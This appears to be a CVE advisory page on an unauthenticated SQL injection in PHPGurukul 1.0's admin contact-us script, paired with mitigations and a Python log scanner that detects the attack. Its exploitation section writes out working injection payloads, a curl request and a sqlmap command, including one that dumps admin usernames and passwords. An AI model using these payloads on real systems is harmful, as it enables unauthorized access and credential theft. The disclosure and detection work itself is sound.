How the CVE Works:
The vulnerability exists in `/admin/contact-us.php` because the `mobnum` parameter is not sanitized. Attackers can inject SQL through this parameter and alter the query the application sends to the database. The application applies neither prepared statements nor input validation, so an attacker can read sensitive data such as admin credentials or student records. Exploitation is remote and requires no authentication, which makes the issue critical. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms a network-reachable attack of low complexity.
DailyCVE Form:
Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/06/2025
What Undercode Says:
Exploitation:
1. Craft Payload:
' OR 1=1-- -
2. Exploit URL:
curl -X GET "http://target.com/admin/contact-us.php?mobnum=' UNION SELECT 1,2,3,4,5-- -"
3. Dump Data:
' UNION SELECT username,password,3,4,5 FROM admin-- -
Protection:
1. Input Sanitization:
$mobnum = mysqli_real_escape_string($conn, $_GET['mobnum']);
2. Prepared Statements:
$stmt = $conn->prepare("SELECT * FROM contacts WHERE mobnum = ?"); // bound parameter, never string-concatenated
$stmt->bind_param("s", $_GET['mobnum']); $stmt->execute();
3. WAF / Web Server Rules (this nginx block denies all access to `/admin/`):
location /admin/ { deny all; }
Detection:
1. SQLMap:
sqlmap -u "http://target.com/admin/contact-us.php?mobnum=1" --risk=3 --level=5
2. Log Analysis:
grep -iE 'union[^a-z0-9]*select' /var/log/apache2/access.log   # case-insensitive; also matches UNION%20SELECT and UNION+SELECT
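An added log-analysis check (example code written for this page, not from PHPGurukul or the advisory) that URL-decodes each parameter of requests to `/admin/contact-us.php` before matching, so encoded, `+`-separated or mixed-case UNION SELECT and tautology probes that a raw grep for `union.select` misses are flagged; the access-log lines are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log sample (not taken from the original page):
# one benign lookup, one URL-encoded UNION SELECT probe, one tautology probe.
SAMPLE_LOG = """\
203.0.113.5 - - [06/May/2025:10:01:02 +0000] "GET /admin/contact-us.php?mobnum=9876543210 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [06/May/2025:10:01:07 +0000] "GET /admin/contact-us.php?mobnum=%27%20UNION%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 200 1042 "-" "curl/8.0"
203.0.113.9 - - [06/May/2025:10:01:09 +0000] "GET /admin/contact-us.php?mobnum='+OR+1%3D1--+- HTTP/1.1" 200 1042 "-" "curl/8.0"
"""

# Combined-log-format prefix: client IP, then the quoted request line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*? "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Signatures run against the URL-DECODED parameter value, so UNION%20SELECT,
# UNION+SELECT and mixed case are all caught (a raw grep for "union.select" is not).
SQLI_PATTERNS = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("tautology", re.compile(r"\bor\s+(\w+)\s*=\s*\1\b", re.I)),   # e.g. OR 1=1
    ("comment_terminator", re.compile(r"--\s*-?\s*$|#\s*$")),      # trailing -- - or #
]

def parse_request(line):
    """Return (ip, path, {param: decoded value}) or None for lines that do not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    params = {}
    for pair in query.split("&") if query else []:
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)   # decode %27, %20 and '+'
    return m.group("ip"), path, params

def scan_log(text, watched_path="/admin/contact-us.php"):
    """Flag requests to the vulnerable script whose decoded parameters match a signature."""
    findings = []
    for line in text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        if path != watched_path:
            continue
        for name, value in params.items():
            for sig, pattern in SQLI_PATTERNS:
                if pattern.search(value):
                    findings.append({"ip": ip, "param": name, "signature": sig, "value": value})
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports four hits, all from 203.0.113.9, while the benign numeric lookup produces none.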
Analytics:
- Attack Surface: Remote, unauthenticated.
- Impact: Data leakage, system compromise.
- Patch Status: No official fix. Mitigate via code hardening.
References:
Sources:
Reported By: nvd.nist.gov